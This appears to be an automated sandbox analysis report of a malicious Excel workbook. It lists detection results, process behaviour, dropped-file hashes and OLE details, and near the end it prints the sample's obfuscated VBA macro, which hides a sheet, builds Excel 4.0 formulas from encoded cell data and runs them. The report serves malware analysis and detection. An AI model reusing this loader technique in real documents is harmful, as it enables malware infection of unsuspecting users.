Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source: ~DF380378EE1DD6AC3F.TMP.0.dr

Initial sample: OLE indicators vbamacros = False

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	11 Scripting	Path Interception	Path Interception	1 Masquerading	OS Credential Dumping	1 File and Directory Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Data Obfuscation	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	11 Scripting	LSASS Memory	2 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
XSG2363662.xls	10%	Virustotal		Browse
XSG2363662.xls	14%	ReversingLabs	Script-Macro.Trojan.Heuristic
XSG2363662.xls	100%	Avira	HEUR/Macro.Downloader.MRAJM.Gen

Source	Detection	Scanner	Label
https://roaming.edog.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://ofcrecsvcapi-int.azurewebsites.net/	0%	URL Reputation	safe
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h	0%	Avira URL Cloud	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://officeci.azurewebsites.net/api/	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://api.aadrm.com	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://api.addins.store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://asgsmsproxyapi.azurewebsites.net/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://ncus.pagecontentsync.	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://dataservice.o365filtering.com	0%	URL Reputation	safe
https://api.cortana.ai	0%	URL Reputation	safe

Name	Malicious	Antivirus Detection	Reputation
1,0,281480500,0000006D90879000,00000104,00000010,00020000,00000000,1,0	true		low

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.diagnosticssdf.office.com	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://login.microsoftonline.com/	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://shell.suite.office.com:1443	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://autodiscover-s.outlook.com/	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://roaming.edog.	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false	URL Reputation: safe	unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://cdn.entity.	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false	URL Reputation: safe	unknown
https://api.addins.omex.office.net/appinfo/query	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://clients.config.office.net/user/v1.0/tenantassociationkey	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://powerlift.acompli.net	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false	URL Reputation: safe	unknown
https://rpsticket.partnerservices.getmicrosoftkey.com	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false	URL Reputation: safe	unknown
https://lookup.onenote.com/lookup/geolocation/v1	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://cortana.ai	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false	URL Reputation: safe	unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://cloudfiles.onenote.com/upload.aspx	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://entitlement.diagnosticssdf.office.com	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://api.aadrm.com/	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false	URL Reputation: safe	unknown
https://ofcrecsvcapi-int.azurewebsites.net/	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false	URL Reputation: safe	unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://api.microsoftstream.com/api/	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://cr.office.com	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false	Avira URL Cloud: safe	low
https://portal.office.com/account/?ref=ClientMeControl	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://graph.ppe.windows.net	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://res.getmicrosoftkey.com/api/redemptionevents	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false	URL Reputation: safe	unknown
https://powerlift-frontdesk.acompli.net	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false	URL Reputation: safe	unknown
https://tasks.office.com	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://officeci.azurewebsites.net/api/	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false	URL Reputation: safe	unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://store.office.cn/addinstemplate	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false	URL Reputation: safe	unknown
https://api.aadrm.com	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false	URL Reputation: safe	unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid=	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://globaldisco.crm.dynamics.com	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://dev0-api.acompli.net/autodetect	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false	URL Reputation: safe	unknown
https://www.odwebp.svc.ms	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false	URL Reputation: safe	unknown
https://api.diagnosticssdf.office.com/v2/feedback	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://api.powerbi.com/v1.0/myorg/groups	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://web.microsoftstream.com/video/	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://api.addins.store.officeppe.com/addinstemplate	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false	URL Reputation: safe	unknown
https://graph.windows.net	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://dataservice.o365filtering.com/	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false	URL Reputation: safe	unknown
https://officesetup.getmicrosoftkey.com	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false	URL Reputation: safe	unknown
https://analysis.windows.net/powerbi/api	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://prod-global-autodetect.acompli.net/autodetect	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false	URL Reputation: safe	unknown
https://outlook.office365.com/autodiscover/autodiscover.json	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://ncus.contentsync.	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false	URL Reputation: safe	unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
http://weather.service.msn.com/data.aspx	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://apis.live.net/v5.0/	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false	URL Reputation: safe	unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://management.azure.com	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://outlook.office365.com	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://wus2.contentsync.	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false	URL Reputation: safe	unknown
https://incidents.diagnostics.office.com	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://clients.config.office.net/user/v1.0/ios	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://insertmedia.bing.office.net/odc/insertmedia	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://o365auditrealtimeingestion.manage.office.com	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://outlook.office365.com/api/v1.0/me/Activities	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://api.office.net	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://incidents.diagnosticssdf.office.com	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://asgsmsproxyapi.azurewebsites.net/	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false	URL Reputation: safe	unknown
https://clients.config.office.net/user/v1.0/android/policies	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://entitlement.diagnostics.office.com	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://substrate.office.com/search/api/v2/init	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://outlook.office.com/	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://storage.live.com/clientlogs/uploadlocation	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://outlook.office365.com/	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://webshell.suite.office.com	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://substrate.office.com/search/api/v1/SearchHistory	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://management.azure.com/	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://login.windows.net/common/oauth2/authorize	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false	URL Reputation: safe	unknown
https://graph.windows.net/	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://api.powerbi.com/beta/myorg/imports	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://devnull.onenote.com	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://ncus.pagecontentsync.	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false	URL Reputation: safe	unknown
https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://messaging.office.com/	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://augloop.office.com/v2	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://skyapi.live.net/Activity/	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false	URL Reputation: safe	unknown
https://clients.config.office.net/user/v1.0/mac	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false		high
https://dataservice.o365filtering.com	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false	URL Reputation: safe	unknown
https://api.cortana.ai	DDF17BCC-E47B-4784-99D4-89162EBE509E.0.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	558779
Start date:	24.01.2022
Start time:	13:35:32
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 4m 18s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	XSG2363662.xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Potential for more IOCs and behavior
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal76.bank.expl.winXLS@1/3@0/0
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xls Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active Picture Object Active AutoShape Object Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 23.211.6.115, 52.109.88.177, 52.109.8.24, 52.109.12.24
Excluded domains from analysis (whitelisted): client.wns.windows.com, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, config.officeapps.live.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net
Not all processes where analyzed, report is missing behavior information

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\DDF17BCC-E47B-4784-99D4-89162EBE509E

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	142029
Entropy (8bit):	5.354833142909493
Encrypted:	false
SSDEEP:	1536:ScQIfgxrBdA3guwQ/Q9DQW+zUk4F77nXmvidZXPE5LWmE9:a8Q9DQW+zwX8U
MD5:	40666193294210597F80F38CFCDB1C52
SHA1:	6E674FFBE31498E23E7D8D621157039A0294084E
SHA-256:	B5602A8E1025CF5561654562AA84E730496B228CE9F09674C8B61D90E511A674
SHA-512:	BEF7C757D3111024136A2930D68DF34E3B81E5ECB36D1AE8A2F030891AECE013616C441093EE31DC8C48395A12341B08EEB73BC616988C81F65431671BE2B344
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-01-24T12:36:25">.. Build: 16.0.14917.30526-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

C:\Users\user\AppData\Local\Temp\~DF09A82308E61BD2D4.TMP

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Reputation:	high, very likely benign file
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF380378EE1DD6AC3F.TMP

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	2.508264720085627
Encrypted:	false
SSDEEP:	192:ETF+mMCXU7e/aWlVob6qoayV1zdERwLIR0cPGzaN:Ex+mMC4e/aBuayPzgpRVG
MD5:	1A1C0669B830C210E9FE50A0EC09C014
SHA1:	FC97F4DB169B6E79165E61428D819579F7F50241
SHA-256:	44D8BB65BB9096860C15972671F3EF38E26D6D626D760A7AD951F57C3B7CE139
SHA-512:	4533E41E64F5C0E681B599D215F8C219928ABD995CA6CD53D437E6B8066A5F9970393152B20B8BBD62AA3C5D61120C0C1F9E8DB40A98AFCE296011521673D3AD
Malicious:	false
Reputation:	low
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: VETTORE; BRT S .P .A., Name of Creating Application: Microsoft Excel, Create Time/Date: Mon Jan 24 11:15:40 2022, Last Saved Time/Date: Mon Jan 24 11:15:43 2022, Security: 0
Entropy (8bit):	5.511085804898523
TrID:	Microsoft Excel sheet (30009/1) 78.94% Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name:	XSG2363662.xls
File size:	50176
MD5:	0a18e47e743c2a3bdb26333764d4d19c
SHA1:	434030db9b84e3832e5cc1019137205aa1c9de6f
SHA256:	6b3407cfd0ef9a6664e61733b8a838b9cd1d05e084a36a8eff0dddb0e21d34c4
SHA512:	d94effd3ac78e9a722d9cfbaf0612a7cf19e68b99a870f58869f4d0b6dbcbcd5b7a6df22c471161a178d8e7d713e5a31534a1c22830740bc83d139f62300246d
SSDEEP:	1536:bsQlYkEIbSkKBEqEXPgsRZmbaoFhZhR0cixIHm09s4av3b+mMC9EM:bhlYkEIuPm3fNRZmbaoFhZhR0cixIHmw
File Content Preview:	........................>...................................;..................................................................................................................................................................................................

File Icon


Icon Hash:	74ecd4c6c3c6c4d8

Static OLE Info

General

Document Type:	OLE
Number of OLE Files:	1

OLE File "XSG2363662.xls"

Indicators

Has Summary Info:	True
Application Name:	Microsoft Excel
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary

Code Page:	1252
Author:	VETTORE; BRT S .P .A.
Last Saved By:
Create Time:	2022-01-24 11:15:40.064000
Last Saved Time:	2022-01-24 11:15:43
Creating Application:	Microsoft Excel
Security:	0

Document Summary

Document Code Page:	1252
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	1048576

Streams with VBA

VBA File Name: Foglio1, Stream Size: 1000

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Foglio1
VBA File Name:	Foglio1
Stream Size:	1000
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . B z v . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 01 f0 00 00 00 da 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff e1 02 00 00 35 03 00 00 00 00 00 00 01 00 00 00 42 7a 76 de 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Foglio1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: Questa_cartella_di_lavoro, Stream Size: 5189

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Questa_cartella_di_lavoro
VBA File Name:	Questa_cartella_di_lavoro
Stream Size:	5189
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . @ . . . N . . . r . . . . . . . . . . . B z Z . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . . ] . . J I . ' . . . 4 . . . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . n . s K . . . I . ^ C . X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . n . s K . . . I . ^ C . X . . . . . . ] . . J I . ' . . . 4 . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 03 00 01 00 00 12 0a 00 00 e4 00 00 00 10 02 00 00 40 0a 00 00 4e 0a 00 00 72 10 00 00 00 00 00 00 01 00 00 00 42 7a 5a b4 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 b2 d9 ee 5d 8d e7 4a 49 b3 27 d6 8f ce 34 8c b8 19 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Questa_cartella_di_lavoro"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function Traduci() As String
Traduci = "O"
End Function
Function forcer()
forcer = "T" & annunci & "O()"
End Function
Function pHiom()
Sheets(msoGradientHorizontal).Cells(37, 15).FormulaLocal = sempre & forcer
End Function
Function sempre()
sempre = "=R" & "I"
End Function
Sub utilizzares(A As Long)
okih = 3 * A: f = 1: mij = (((((((((((Run(((((((((("O" & "4" & "")))))))))))))))))))))
End Sub
Function annunci() As String
annunci = Traduci & "RN"
End Function
Sub Informativa_1()
zs = 1
tT = potremmo(0 + zs, "" & zs): riguarda
Ad = eriote
For Each ert In selezionate
N = (accedere("=" & ert, 1 + 7)): utilizzares ((zs))
Next
Workbooks.Application.DisplayAlerts = False: Application.Quit
End Sub
Function accedere(ed As String, s As Integer)
s = s: Sheets(msoEditingCorner).[O5].FormulaLocal = ed
End Function
Sub riguarda()
ActiveSheet.Visible = 0
End Sub
Function selezionate() As Variant
selezionate = Split(esperienzaA, "z")
End Function
Function potremmo(A As Integer, bi As String)
Worksheets.Add(Before:=Worksheets((A)), Type:=3).Name = bi
End Function
Function esperienzaA()
il = Cells(120, 8)
For o = 1 To Len(il) Step 4
h = h & Mid(il, o, 2)
U = U & Mid(il, o + 2, 2)
Next
